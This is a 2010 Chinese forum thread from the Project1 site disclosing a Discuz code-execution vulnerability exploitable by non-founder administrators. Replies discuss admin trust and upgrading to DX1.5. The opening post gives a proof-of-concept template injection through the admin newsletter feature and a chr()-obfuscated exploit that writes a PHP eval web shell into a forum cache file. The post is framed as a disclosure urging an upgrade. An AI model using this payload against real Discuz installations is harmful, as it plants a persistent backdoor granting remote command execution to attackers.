Project1
标题:
Discuz非创始人管理员代码执行漏洞
[打印本页]
作者:
我爱食叉包
时间:
2010-10-24 20:39
标题:
Discuz非创始人管理员代码执行漏洞
本帖最后由 我爱食叉包 于 2010-10-24 20:40 编辑
global.func.php
http_imgload.jpg
(35.85 KB, 下载次数: 12)
下载附件
保存到相册
2010-10-24 20:39 上传
POC:
1. admincp.php?frames=yes&action=members&operation=newsletter
2. 发短消息,通知内容为:{${phpinfo()}}
EXP - (fputs(fopen('forumdata/cache/cache_01.php','w'),'<?php eval($_POST[cmd])?>');) :
${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}
发布时间:10.19 22.39
DZ X1.5无效。管理们早点升级DX1.5吧,20分钟就够了。。
作者:
fux2
时间:
2010-10-24 21:52
我们站的管理员素质都非常好的!有这个漏洞他们会去钻么?
如果居心不良能当管理么……
作者:
傳說の仙劍
时间:
2010-10-24 21:54
不是那么簡單
升級后又得重新弄回稱號系統
作者:
明火暗雷
时间:
2010-10-25 00:33
DX1.5的“内核”很有爱。至于外观就更有爱了。。搞投票吧,外观我反正很萌之
作者:
IamI
时间:
2010-10-26 06:03
噗...面对此情此景,我表示沉默。
欢迎光临 Project1 (https://rpg.blue/)
Powered by Discuz! X3.1
